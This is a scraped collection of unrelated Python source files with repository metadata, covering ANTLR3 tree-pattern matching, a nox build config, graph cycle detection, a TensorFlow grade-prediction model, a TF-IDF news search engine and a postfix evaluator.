print(f"[{epoach+1}/{num_epoachs}]: -> [{i+1}/{total_steps}] -> loss: {loss_accumulation/times4print}")
loss_accumulation = 0
# TEST
model.eval()
label_cp = np.zeros(len(valid_loader))
np_out = np.zeros((len(valid_loader), num_classes))
with torch.no_grad():
class_correct = list(0. for i in range(num_classes))
class_total = class_correct.copy()
for k, (imgs, labels) in enumerate(valid_loader):
label_cp[k] = labels.numpy()
imgs = imgs.to(device)
labels = labels.to(device)
out = model(imgs)
np_out[k] = out.numpy()
_, predicted = torch.max(out, 1)
ans_batch = (predicted == labels).squeeze()
for k, label in enumerate(labels):
if ans_batch.item() == 1: # right
class_correct[label] += 1
class_total[label] += 1
if sum(class_total) != 0:
print(f">>> FINAL ACCURACY: {100 * sum(class_correct)/sum(class_total)}% -> {class_correct}/{class_total}")
for i in range(num_classes):
if class_total[i] != 0:
print(f">>> [{classes[i]}] : {100 * class_correct[i]/class_total[i]}% -> {class_correct[i]}/{class_total[i]}")
np.savetxt(key_word+'_out.txt', np_out)
np.savetxt('label_out.txt', label_cp)
torch.save(model.state_dict(), key_word+'_stream_model.ckpt') | [
"noreply@github.com"
] | noreply@github.com |
f0ca2ca8e3d495e1b3a28c35d67234789796811b | 32c56293475f49c6dd1b0f1334756b5ad8763da9 | /google-cloud-sdk/lib/third_party/antlr3/treewizard.py | f598edde386f82916f466737236f3becde4458a3 | [
"BSD-3-Clause",
"MIT",
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | bopopescu/socialliteapp | b9041f17f8724ee86f2ecc6e2e45b8ff6a44b494 | 85bb264e273568b5a0408f733b403c56373e2508 | refs/heads/master | 2022-11-20T03:01:47.654498 | 2020-02-01T20:29:43 | 2020-02-01T20:29:43 | 282,403,750 | 0 | 0 | MIT | 2020-07-25T08:31:59 | 2020-07-25T08:31:59 | null | UTF-8 | Python | false | false | 16,576 | py | # Lint as: python2, python3
""" @package antlr3.tree
@brief ANTLR3 runtime package, treewizard module
A utility module to create ASTs at runtime.
See <http://www.antlr.org/wiki/display/~admin/2007/07/02/Exploring+Concept+of+TreeWizard> for an overview. Note that the API of the Python implementation is slightly different.
"""
# begin[licence]
#
# [The "BSD licence"]
# Copyright (c) 2005-2008 Terence Parr
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. The name of the author may not be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
# IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
# OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
# NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
# THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# end[licence]
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from antlr3.constants import INVALID_TOKEN_TYPE
from antlr3.tokens import CommonToken
from antlr3.tree import CommonTree, CommonTreeAdaptor
import six
from six.moves import range
def computeTokenTypes(tokenNames):
  """Build the inverse index of tokenNames.

  Args:
    tokenNames: sequence of token names indexed by integer token type,
      or None.

  Returns:
    dict mapping each token name to its integer token type; an empty
    dict when tokenNames is None.
  """
  if tokenNames is None:
    return {}

  # Invert the type->name list into a name->type mapping.
  return {name: ttype for ttype, name in enumerate(tokenNames)}
## token types for pattern parser
EOF = -1      # end of pattern input
BEGIN = 1     # '(' -- start of a subtree
END = 2       # ')' -- end of a subtree
ID = 3        # identifier (token name, or 'nil')
ARG = 4       # '[text]' argument payload
PERCENT = 5   # '%' -- introduces a "%label:" prefix
COLON = 6     # ':' -- separates label from node name
DOT = 7       # '.' -- wildcard node
class TreePatternLexer(object):
  """Tokenizer for tree-pattern strings such as "(A B[foo] %lbl:C)"."""

  # Characters that may start an identifier ...
  __idStartChar = frozenset(
      'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_')

  # ... and those allowed anywhere after the first character.
  __idChar = __idStartChar | frozenset('0123456789')

  def __init__(self, pattern):
    ## The tree pattern to lex like "(A B C)"
    self.pattern = pattern

    ## Index into input string
    self.p = -1

    ## Current char
    self.c = None

    ## How long is the pattern in char?
    self.n = len(pattern)

    ## Set when token type is ID or ARG
    self.sval = None

    ## Becomes True when an unexpected character is seen.
    self.error = False

    self.consume()

  def nextToken(self):
    """Return the next token type; ID/ARG text is left in self.sval."""
    self.sval = ''
    while self.c != EOF:
      if self.c in ' \n\r\t':
        # Skip whitespace between tokens.
        self.consume()
        continue

      if self.c in self.__idStartChar:
        # Identifier: greedily collect the whole run of id characters.
        while self.c in self.__idChar:
          self.sval += self.c
          self.consume()
        return ID

      punct = {'(': BEGIN, ')': END, '%': PERCENT, ':': COLON, '.': DOT}
      if self.c in punct:
        ttype = punct[self.c]
        self.consume()
        return ttype

      if self.c == '[':
        # Grab [x] as a string, returning x. '\]' escapes the closing
        # bracket; any other backslash is kept literally.
        self.consume()
        while self.c != ']':
          if self.c == '\\':
            self.consume()
            if self.c != ']':
              self.sval += '\\'
            self.sval += self.c
          else:
            self.sval += self.c
          self.consume()
        self.consume()
        return ARG

      # Unknown character: flag the error and report end of input.
      self.consume()
      self.error = True
      return EOF

    return EOF

  def consume(self):
    """Advance one character; self.c becomes EOF past the end."""
    self.p += 1
    self.c = self.pattern[self.p] if self.p < self.n else EOF
class TreePatternParser(object):
  """Recursive-descent parser for tree patterns.

  Consumes tokens from a TreePatternLexer and builds a tree with the
  supplied adaptor. Token types for node names are resolved through
  the wizard. Parse methods return None on any syntax error.
  """

  def __init__(self, tokenizer, wizard, adaptor):
    self.tokenizer = tokenizer
    self.wizard = wizard
    self.adaptor = adaptor
    self.ttype = tokenizer.nextToken()  # kickstart

  def pattern(self):
    """Parse a whole pattern: either a tree "(...)" or a single node.

    Returns the root node, or None on error / trailing junk.
    """
    if self.ttype == BEGIN:
      return self.parseTree()

    elif self.ttype == ID:
      node = self.parseNode()
      if self.ttype == EOF:
        return node

      return None  # extra junk on end

    return None

  def parseTree(self):
    """Parse "(root child ...)" and return the root, or None on error."""
    if self.ttype != BEGIN:
      return None

    self.ttype = self.tokenizer.nextToken()
    root = self.parseNode()
    if root is None:
      return None

    # Children may be nested subtrees or plain/labelled/wildcard nodes.
    while self.ttype in (BEGIN, ID, PERCENT, DOT):
      if self.ttype == BEGIN:
        subtree = self.parseTree()
        self.adaptor.addChild(root, subtree)

      else:
        child = self.parseNode()
        if child is None:
          return None

        self.adaptor.addChild(root, child)

    if self.ttype != END:
      return None

    self.ttype = self.tokenizer.nextToken()
    return root

  def parseNode(self):
    """Parse one node: [%label:] ( '.' | ID [arg] | nil ).

    Returns the created node, or None on error.
    """
    # "%label:" prefix
    label = None
    if self.ttype == PERCENT:
      self.ttype = self.tokenizer.nextToken()
      if self.ttype != ID:
        return None

      label = self.tokenizer.sval
      self.ttype = self.tokenizer.nextToken()
      if self.ttype != COLON:
        return None

      self.ttype = self.tokenizer.nextToken()  # move to ID following colon

    # Wildcard?
    if self.ttype == DOT:
      self.ttype = self.tokenizer.nextToken()
      # Wildcard nodes carry a dummy token; only the label matters.
      wildcardPayload = CommonToken(0, '.')
      node = WildcardTreePattern(wildcardPayload)
      if label is not None:
        node.label = label
      return node

    # "ID" or "ID[arg]"
    if self.ttype != ID:
      return None

    tokenName = self.tokenizer.sval
    self.ttype = self.tokenizer.nextToken()

    if tokenName == 'nil':
      return self.adaptor.nil()

    text = tokenName
    # check for arg
    arg = None
    if self.ttype == ARG:
      arg = self.tokenizer.sval
      text = arg
      self.ttype = self.tokenizer.nextToken()

    # create node
    treeNodeType = self.wizard.getTokenType(tokenName)
    if treeNodeType == INVALID_TOKEN_TYPE:
      return None

    node = self.adaptor.createFromType(treeNodeType, text)
    # Only TreePattern nodes can remember labels / text-arg flags.
    if label is not None and isinstance(node, TreePattern):
      node.label = label

    if arg is not None and isinstance(node, TreePattern):
      node.hasTextArg = True

    return node
class TreePattern(CommonTree):
  """Tree node used during parse().

  When a pattern uses %label:TOKENNAME, the label must be remembered
  so matched nodes can be reported under that name.
  """

  def __init__(self, payload):
    CommonTree.__init__(self, payload)
    self.label = None        # label from a "%label:" prefix, if any
    self.hasTextArg = None   # set when the pattern supplied "[text]"

  def toString(self):
    text = CommonTree.toString(self)
    if self.label is None:
      return text
    return '%' + self.label + ':' + text
class WildcardTreePattern(TreePattern):
  """Pattern node for the '.' wildcard; matches any single tree node."""
  pass
class TreePatternTreeAdaptor(CommonTreeAdaptor):
  """This adaptor creates TreePattern objects for use during scan()"""

  def createWithPayload(self, payload):
    # Build TreePattern nodes (rather than plain CommonTree) so labels
    # and text-arg flags survive pattern parsing.
    return TreePattern(payload)
class TreeWizard(object):
"""
Build and navigate trees with this object. Must know about the names
of tokens so you have to pass in a map or array of token names (from which
this class can build the map). I.e., Token DECL means nothing unless the
class can translate it to a token type.
In order to create nodes and navigate, this class needs a TreeAdaptor.
This class can build a token type -> node index for repeated use or for
iterating over the various nodes with a particular type.
This class works in conjunction with the TreeAdaptor rather than moving
all this functionality into the adaptor. An adaptor helps build and
navigate trees using methods. This class helps you do it with string
patterns like "(A B C)". You can create a tree from that pattern or
match subtrees against it.
"""
def __init__(self, adaptor=None, tokenNames=None, typeMap=None):
self.adaptor = adaptor
if typeMap is None:
self.tokenNameToTypeMap = computeTokenTypes(tokenNames)
else:
if tokenNames is not None:
raise ValueError("Can't have both tokenNames and typeMap")
self.tokenNameToTypeMap = typeMap
def getTokenType(self, tokenName):
"""Using the map of token names to token types, return the type."""
try:
return self.tokenNameToTypeMap[tokenName]
except KeyError:
return INVALID_TOKEN_TYPE
def create(self, pattern):
"""
Create a tree or node from the indicated tree pattern that closely
follows ANTLR tree grammar tree element syntax:
(root child1 ... child2).
You can also just pass in a node: ID
Any node can have a text argument: ID[foo]
(notice there are no quotes around foo--it's clear it's a string).
nil is a special name meaning "give me a nil node". Useful for
making lists: (nil A B C) is a list of A B C.
"""
tokenizer = TreePatternLexer(pattern)
parser = TreePatternParser(tokenizer, self, self.adaptor)
return parser.pattern()
def index(self, tree):
"""Walk the entire tree and make a node name to nodes mapping.
For now, use recursion but later nonrecursive version may be
more efficient. Returns a dict int -> list where the list is
of your AST node type. The int is the token type of the node.
"""
m = {}
self._index(tree, m)
return m
def _index(self, t, m):
"""Do the work for index"""
if t is None:
return
ttype = self.adaptor.getType(t)
elements = m.get(ttype)
if elements is None:
m[ttype] = elements = []
elements.append(t)
for i in range(self.adaptor.getChildCount(t)):
child = self.adaptor.getChild(t, i)
self._index(child, m)
def find(self, tree, what):
"""Return a list of matching token.
what may either be an integer specifzing the token type to find or
a string with a pattern that must be matched.
"""
if isinstance(what, six.integer_types):
return self._findTokenType(tree, what)
elif isinstance(what, six.string_types):
return self._findPattern(tree, what)
else:
raise TypeError("'what' must be string or integer")
def _findTokenType(self, t, ttype):
"""Return a List of tree nodes with token type ttype"""
nodes = []
def visitor(tree, parent, childIndex, labels):
nodes.append(tree)
self.visit(t, ttype, visitor)
return nodes
def _findPattern(self, t, pattern):
"""Return a List of subtrees matching pattern."""
subtrees = []
# Create a TreePattern from the pattern
tokenizer = TreePatternLexer(pattern)
parser = TreePatternParser(tokenizer, self, TreePatternTreeAdaptor())
tpattern = parser.pattern()
# don't allow invalid patterns
if (tpattern is None or tpattern.isNil() or
isinstance(tpattern, WildcardTreePattern)):
return None
rootTokenType = tpattern.getType()
def visitor(tree, parent, childIndex, label):
if self._parse(tree, tpattern, None):
subtrees.append(tree)
self.visit(t, rootTokenType, visitor)
return subtrees
def visit(self, tree, what, visitor):
"""Visit every node in tree matching what, invoking the visitor.
If what is a string, it is parsed as a pattern and only matching
subtrees will be visited.
The implementation uses the root node of the pattern in combination
with visit(t, ttype, visitor) so nil-rooted patterns are not allowed.
Patterns with wildcard roots are also not allowed.
If what is an integer, it is used as a token type and visit will match
all nodes of that type (this is faster than the pattern match).
The labels arg of the visitor action method is never set (it's None)
since using a token type rather than a pattern doesn't let us set a
label.
"""
if isinstance(what, six.integer_types):
self._visitType(tree, None, 0, what, visitor)
elif isinstance(what, six.string_types):
self._visitPattern(tree, what, visitor)
else:
raise TypeError("'what' must be string or integer")
def _visitType(self, t, parent, childIndex, ttype, visitor):
"""Do the recursive work for visit"""
if t is None:
return
if self.adaptor.getType(t) == ttype:
visitor(t, parent, childIndex, None)
for i in range(self.adaptor.getChildCount(t)):
child = self.adaptor.getChild(t, i)
self._visitType(child, t, i, ttype, visitor)
def _visitPattern(self, tree, pattern, visitor):
"""
For all subtrees that match the pattern, execute the visit action.
"""
# Create a TreePattern from the pattern
tokenizer = TreePatternLexer(pattern)
parser = TreePatternParser(tokenizer, self, TreePatternTreeAdaptor())
tpattern = parser.pattern()
# don't allow invalid patterns
if (tpattern is None or tpattern.isNil() or
isinstance(tpattern, WildcardTreePattern)):
return
rootTokenType = tpattern.getType()
def rootvisitor(tree, parent, childIndex, labels):
labels = {}
if self._parse(tree, tpattern, labels):
visitor(tree, parent, childIndex, labels)
self.visit(tree, rootTokenType, rootvisitor)
def parse(self, t, pattern, labels=None):
"""
Given a pattern like (ASSIGN %lhs:ID %rhs:.) with optional labels
on the various nodes and '.' (dot) as the node/subtree wildcard,
return true if the pattern matches and fill the labels Map with
the labels pointing at the appropriate nodes. Return false if
the pattern is malformed or the tree does not match.
If a node specifies a text arg in pattern, then that must match
for that node in t.
"""
tokenizer = TreePatternLexer(pattern)
parser = TreePatternParser(tokenizer, self, TreePatternTreeAdaptor())
tpattern = parser.pattern()
return self._parse(t, tpattern, labels)
def _parse(self, t1, t2, labels):
"""
Do the work for parse. Check to see if the t2 pattern fits the
structure and token types in t1. Check text if the pattern has
text arguments on nodes. Fill labels map with pointers to nodes
in tree matched against nodes in pattern with labels.
"""
# make sure both are non-null
if t1 is None or t2 is None:
return False
# check roots (wildcard matches anything)
if not isinstance(t2, WildcardTreePattern):
if self.adaptor.getType(t1) != t2.getType():
return False
if t2.hasTextArg and self.adaptor.getText(t1) != t2.getText():
return False
if t2.label is not None and labels is not None:
# map label in pattern to node in t1
labels[t2.label] = t1
# check children
n1 = self.adaptor.getChildCount(t1)
n2 = t2.getChildCount()
if n1 != n2:
return False
for i in range(n1):
child1 = self.adaptor.getChild(t1, i)
child2 = t2.getChild(i)
if not self._parse(child1, child2, labels):
return False
return True
def equals(self, t1, t2, adaptor=None):
"""
Compare t1 and t2; return true if token types/text, structure match
exactly.
The trees are examined in their entirety so that (A B) does not match
(A B C) nor (A (B C)).
"""
if adaptor is None:
adaptor = self.adaptor
return self._equals(t1, t2, adaptor)
def _equals(self, t1, t2, adaptor):
# make sure both are non-null
if t1 is None or t2 is None:
return False
# check roots
if adaptor.getType(t1) != adaptor.getType(t2):
return False
if adaptor.getText(t1) != adaptor.getText(t2):
return False
# check children
n1 = adaptor.getChildCount(t1)
n2 = adaptor.getChildCount(t2)
if n1 != n2:
return False
for i in range(n1):
child1 = adaptor.getChild(t1, i)
child2 = adaptor.getChild(t2, i)
if not self._equals(child1, child2, adaptor):
return False
return True
| [
"jonathang132298@gmail.com"
] | jonathang132298@gmail.com |
4c6b37c4b6d003a5c694b4bdd7795f7854e6f430 | 6fa701cdaa0d83caa0d3cbffe39b40e54bf3d386 | /google/cloud/managedidentities/v1beta1/managedidentities-v1beta1-py/noxfile.py | 34dc58b5f6e2c0eefe1b194e280ee2a1542d9b95 | [
"Apache-2.0"
] | permissive | oltoco/googleapis-gen | bf40cfad61b4217aca07068bd4922a86e3bbd2d5 | 00ca50bdde80906d6f62314ef4f7630b8cdb6e15 | refs/heads/master | 2023-07-17T22:11:47.848185 | 2021-08-29T20:39:47 | 2021-08-29T20:39:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,595 | py | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import pathlib
import shutil
import subprocess
import sys
import nox # type: ignore
CURRENT_DIRECTORY = pathlib.Path(__file__).parent.absolute()
LOWER_BOUND_CONSTRAINTS_FILE = CURRENT_DIRECTORY / "constraints.txt"
PACKAGE_NAME = subprocess.check_output([sys.executable, "setup.py", "--name"], encoding="utf-8")
nox.sessions = [
"unit",
"cover",
"mypy",
"check_lower_bounds"
# exclude update_lower_bounds from default
"docs",
]
@nox.session(python=['3.6', '3.7', '3.8', '3.9'])
def unit(session):
"""Run the unit test suite."""
session.install('coverage', 'pytest', 'pytest-cov', 'asyncmock', 'pytest-asyncio')
session.install('-e', '.')
session.run(
'py.test',
'--quiet',
'--cov=google/cloud/managedidentities_v1beta1/',
'--cov-config=.coveragerc',
'--cov-report=term',
'--cov-report=html',
os.path.join('tests', 'unit', ''.join(session.posargs))
)
@nox.session(python='3.7')
def cover(session):
"""Run the final coverage report.
This outputs the coverage report aggregating coverage from the unit
test runs (not system test runs), and then erases coverage data.
"""
session.install("coverage", "pytest-cov")
session.run("coverage", "report", "--show-missing", "--fail-under=100")
session.run("coverage", "erase")
@nox.session(python=['3.6', '3.7'])
def mypy(session):
"""Run the type checker."""
session.install('mypy', 'types-pkg_resources')
session.install('.')
session.run(
'mypy',
'--explicit-package-bases',
'google',
)
@nox.session
def update_lower_bounds(session):
"""Update lower bounds in constraints.txt to match setup.py"""
session.install('google-cloud-testutils')
session.install('.')
session.run(
'lower-bound-checker',
'update',
'--package-name',
PACKAGE_NAME,
'--constraints-file',
str(LOWER_BOUND_CONSTRAINTS_FILE),
)
@nox.session
def check_lower_bounds(session):
"""Check lower bounds in setup.py are reflected in constraints file"""
session.install('google-cloud-testutils')
session.install('.')
session.run(
'lower-bound-checker',
'check',
'--package-name',
PACKAGE_NAME,
'--constraints-file',
str(LOWER_BOUND_CONSTRAINTS_FILE),
)
@nox.session(python='3.6')
def docs(session):
"""Build the docs for this library."""
session.install("-e", ".")
session.install("sphinx<3.0.0", "alabaster", "recommonmark")
shutil.rmtree(os.path.join("docs", "_build"), ignore_errors=True)
session.run(
"sphinx-build",
"-W", # warnings as errors
"-T", # show full traceback on exception
"-N", # no colors
"-b",
"html",
"-d",
os.path.join("docs", "_build", "doctrees", ""),
os.path.join("docs", ""),
os.path.join("docs", "_build", "html", ""),
)
| [
"bazel-bot-development[bot]@users.noreply.github.com"
] | bazel-bot-development[bot]@users.noreply.github.com |
691476e157765a1179b72bce27e53cd645aa1b05 | 4d5b1d7bf263449d001573ec0428bcedfc992cdf | /DS-Graphs-master/DS-Graphs-master/DS-Graphs/Detect Cycle in a directed graph using colors.py | 81e14889cd85dde7f90c9f2b00c7c579d5746610 | [] | no_license | sgupta117/Data-Structure-with-Python | bdb5b710a4c4b3e793be91973eb0a35ae4c42b96 | 82b3f10e2611e064705f41533df9aec81fa99821 | refs/heads/master | 2021-02-17T21:57:13.351016 | 2020-06-20T20:55:21 | 2020-06-20T20:55:21 | 245,129,926 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,289 | py | # Python program to deetect cycle in
# a directed graph
from collections import defaultdict
class Graph():
def __init__(self, V):
self.V = V
self.graph = defaultdict(list)
def addEdge(self, u, v):
self.graph[u].append(v)
def DFSUtil(self, u, color):
# GRAY : This vertex is being processed (DFS
# for this vertex has started, but not
# ended (or this vertex is in function
# call stack)
color[u] = "GRAY"
for v in self.graph[u]:
if color[v] == "GRAY":
return True
if color[v] == "WHITE" and self.DFSUtil(v, color) == True:
return True
color[u] = "BLACK"
return False
def isCyclic(self):
color = ["WHITE"] * self.V
for i in range(self.V):
if color[i] == "WHITE":
if self.DFSUtil(i, color) == True:
return True
return False
# Driver program to test above functions
g = Graph(4)
g.addEdge(0, 1)
g.addEdge(0, 2)
g.addEdge(1, 2)
g.addEdge(2, 0)
g.addEdge(2, 3)
g.addEdge(3, 3)
print
"Graph contains cycle" if g.isCyclic() == True \
else "Graph doesn't conatin cycle" | [
"noreply@github.com"
] | noreply@github.com |
4d387f41ec94b1fdbd8c41be171e0c42b85c313d | 4b28a599d495779d60f0013a11bc7954251139fa | /priorCourseGradeTF_inner.py | fa01230f5554e0fda56a579159933aa71a6b3267 | [] | no_license | JasonLC506/nittany_ai | 18653a18c3b47a55045b2e595bfccff6951706da | 1e004bf042e2939b8eefac172fa5ec45ae1c9da9 | refs/heads/master | 2020-06-17T00:14:33.076238 | 2019-07-09T15:01:35 | 2019-07-09T15:01:35 | 195,740,355 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,106 | py | import tensorflow as tf
import _pickle as cPickle
import numpy as np
import time
from tqdm import tqdm
from priorCourseGradeTF import (
data_loader,
PriorCourseGrade as PCG,
)
MAX_ITER = 10
class PriorCourseGrade(PCG):
def setup_network(self):
with tf.name_scope("embedding"):
self.embds = tf.Variable(tf.random_uniform([self.C + 1, self.K], minval=0.0, maxval=1.0),
name="embds") # self.C is bias embedding
input_grades_enlarge = tf.expand_dims(self.input_grades, axis=-1)
input_scaled_embds = tf.multiply(input_grades_enlarge, self.embds)
# maximum pooling #
self.input_embd = tf.reduce_max(input_scaled_embds, axis=1)
# output course embd #
self.output_embd = tf.nn.embedding_lookup(self.embds, self.output_course)
# with tf.name_scope("compare"):
# self.diff = tf.nn.relu(self.output_embd - self.input_embd)
#
# with tf.name_scope("predict"):
# self.predict_grade = tf.divide(1.0, tf.add(1.0, tf.reduce_sum(self.diff, axis=-1)))
self.predict_grade = tf.nn.sigmoid(tf.einsum("ij,ij->i", self.input_embd, self.output_embd))
if __name__ == "__main__":
# with open("data/cou_pre", "r") as df:
# data_cou_pre, cou_dict_inv, Ord2Grade = cPickle.load(df)
# # with open("data/cou_pre_test", "r") as df:
# # data_cou_pre, cou_dict_inv, Ord2Grade = cPickle.load(df)
# C = len(cou_dict_inv)
# data = data_generator(data_cou_pre)
# # data.C = 8900
# print(data.C)
# print(data.N)
# pcg = PriorCourseGrade(C=data.C)
# pcg.initialize()
# pcg.train(data, batch_size=256)
# with train valid test #
data_train = data_loader("data/cou_pre_train")
data_valid = data_loader("data/cou_pre_valid")
data_test = data_loader("data/cou_pre_test")
pcg = PriorCourseGrade(C=data_train.C, K=20)
pcg.initialize()
pcg.train(data_train, data_valid=data_valid, batch_size=256, save_emb=False)
pcg.restore()
pcg.evaluate(data_test) | [
"jpz5181@ist.psu.edu"
] | jpz5181@ist.psu.edu |
d3dc1c55df1dd5ceae50f340e72552e80372fff6 | 20755489698a4bfcc48d3b353a12a1b80085b923 | /persian-news-search-engine/SecondPhase/QPCL.py | 1a7d49cdef05ac8dd4fbe641e187a50f76d77ceb | [] | no_license | MehradShm/InformationRetrieval | 3f005447d5f53ec5a0b212e2308523cd5ab04ea8 | 2dcf0517ae4907f70ab2359c1bfb4564c8a58a01 | refs/heads/main | 2023-02-08T13:17:01.781851 | 2020-12-31T07:11:46 | 2020-12-31T07:11:46 | 325,738,236 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,021 | py | from UI import get_input
import numpy as np
import heapq
import pandas as pd
import random
import time
collection_size = 55109
def Load_Data(field):
df1 = pd.read_csv('data/1.csv')
df2 = pd.read_csv('data/2.csv')
df3 = pd.read_csv('data/3.csv')
df4 = pd.read_csv('data/4.csv')
df5 = pd.read_csv('data/5.csv')
df6 = pd.read_csv('data/6.csv')
a = [df1,df2,df3,df4,df5,df6]
b = [df1.shape[0],df2.shape[0],df3.shape[0],df4.shape[0],df5.shape[0],df6.shape[0]]
df_sizes = [0,df1.shape[0],df1.shape[0]+df2.shape[0],
df1.shape[0]+df2.shape[0]+df3.shape[0],
df1.shape[0]+df2.shape[0]+df3.shape[0]+df4.shape[0],
df1.shape[0]+df2.shape[0]+df3.shape[0]+df4.shape[0]+df5.shape[0],
df1.shape[0]+df2.shape[0]+df3.shape[0]+df4.shape[0]+df5.shape[0]+df6.shape[0]]
Gdata, file_index = [], 0
for doc_index in range(0,55109):
if doc_index == df_sizes[file_index+1]:
file_index += 1
target_data = a[file_index].loc[doc_index-df_sizes[file_index],field]
Gdata.append(target_data)
return (Gdata)
def Load_TFIDF():
tf_idf, count = {},0
with open("tf_idf.txt",'r') as index:
line = index.readline().split(" ")
while count < 113181:
count+=1
term, scores = line[0], line[1:-1]
if term not in tf_idf.keys():
tf_idf[term] = {}
for tmp in scores:
doc_id, score = tmp.split(":")
tf_idf[term][int(doc_id)] = float(score)
line = index.readline().split(" ")
return tf_idf
def Load_DocumentVectors():
document_vectors, count = {}, 0
with open("documentvector.txt",'r') as vectors:
line = vectors.readline().split(" ")
while count < 54481:
count+=1
doc_id, terms = int(line[0]), line[1:-1]
if doc_id not in document_vectors.keys():
document_vectors[doc_id] = {}
for tmp in terms:
term, score = tmp.split(":")
document_vectors[doc_id][term] = float(score)
line = vectors.readline().split(" ")
return document_vectors
def make_document_frequencies():
document_frequencies, count = {}, 0
with open("inverted_index.txt",'r') as index:
line = index.readline().split(" ")
while count < 113181:
count+=1
term, frequency = line[0], len(line[1:-1])
document_frequencies[term] = frequency
line = index.readline().split(" ")
return document_frequencies
def Load_Champions_Lists():
champions_lists, count = {}, 0
with open("ChampionsList.txt",'r') as champion:
line = champion.readline().split(" ")
while count < 113181:
count += 1
term, champions = line[0], map(int,line[1:-1])
champions_lists[term] = champions
line = champion.readline().split(" ")
return champions_lists
def Similarity(query , document, tf_idf, document_vectors, document_frequencies):
product, norm_query, norm_document, query_score = 0, 0, 0, 0
for term in query:
count = query[term]
query_score = (1+np.log10(count)) * np.log10(collection_size/document_frequencies[term])
if document in tf_idf[term].keys():
product += query_score * tf_idf[term][document]
norm_query += query_score ** 2
if document in document_vectors.keys():
for term in document_vectors[document]:
norm_document += document_vectors[document][term] ** 2
if norm_document !=0:
similarity = product / np.sqrt(norm_query * norm_document)
return similarity
else:
return 0
def ProcessQueriesWithChampionsList():
print("Preparing Data For Query Processing, Please Wait...")
tf_idf, document_vectors, document_frequencies, titles, contents = Load_TFIDF(), Load_DocumentVectors(), make_document_frequencies(), Load_Data('title'), Load_Data('content')
champions_lists = Load_Champions_Lists()
while True:
query = get_input()
start_time = time.time()
candidate_documents, scores = [], []
for term in query:
for doc_id in champions_lists[term]:
candidate_documents.append(doc_id)
for index in candidate_documents:
similarity = Similarity(query, index, tf_idf, document_vectors, document_frequencies)
heapq.heappush(scores, (((-1) * similarity,index)))
best = heapq.nsmallest(10,scores)
doc_IDs = [tmp[1] for tmp in best]
for i in range(10):
print("~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~")
print(str(i+1)+"." + titles[doc_IDs[i]]+ " --> ID:" + str(doc_IDs[i]+1), '\n')
print(contents[doc_IDs[i]],'\n')
print("\n", end = '')
print("--- %s seconds ---" % (time.time() - start_time))
print("\n\n")
ProcessQueriesWithChampionsList() | [
"noreply@github.com"
] | noreply@github.com |
e2ab0a6b5f834da36da9c43a403a5cbf2d0cdc65 | 760fc9cf9aabafba3f9f3cd7f5c234a6609b5ebc | /DATA-STRUCTURES/Stack/PostfixEvaluation.py | 8a459fac9c5b28824758c1dd759f94032c475b65 | [] | no_license | disha2sinha/Data-Structures-and-Algorithms | a7db12dbbdc9491efa0800d4e464481623fc7f3c | 8b58d06abf5244b6932561377290bdbd5ea146d7 | refs/heads/master | 2022-06-03T21:54:13.422645 | 2022-05-10T16:31:34 | 2022-05-10T16:31:34 | 201,489,081 | 6 | 5 | null | 2020-10-02T07:52:35 | 2019-08-09T15:01:05 | C++ | UTF-8 | Python | false | false | 835 | py | def operation(op1, op2, operator):
if operator == "+":
return op1+op2
if operator == "-":
return op1-op2
if operator == "*":
return op1*op2
if operator == "/":
return op1/op2
if operator == "^":
return op1^op2
def evaluate(exp_list):
stack = []
for i in range(len(exp_list)):
if exp_list[i] == '+' or exp_list[i] == '-' or exp_list[i] == '/' or exp_list[i] == '*' or exp_list == '^':
operand1 = int(stack.pop())
operand2 = int(stack.pop())
stack.append(operation(operand2, operand1, exp_list[i]))
else:
stack.append(exp_list[i])
return stack[-1]
expression = input("Enter Postfix Expression: ")
exp_list = list(expression)
e = evaluate(exp_list)
print("Result :",e)
| [
"noreply@github.com"
] | noreply@github.com |
a13aff91ea61f82280ceae0feb8ad248185c068d | 8c365e5d817a0bb2000b9158f23dece49725978f | /Python/Algo/Sorting/binary_sort.py | 6da33ec142d6fbaa54691ef42772b0d3d4d9d501 | [
"MIT"
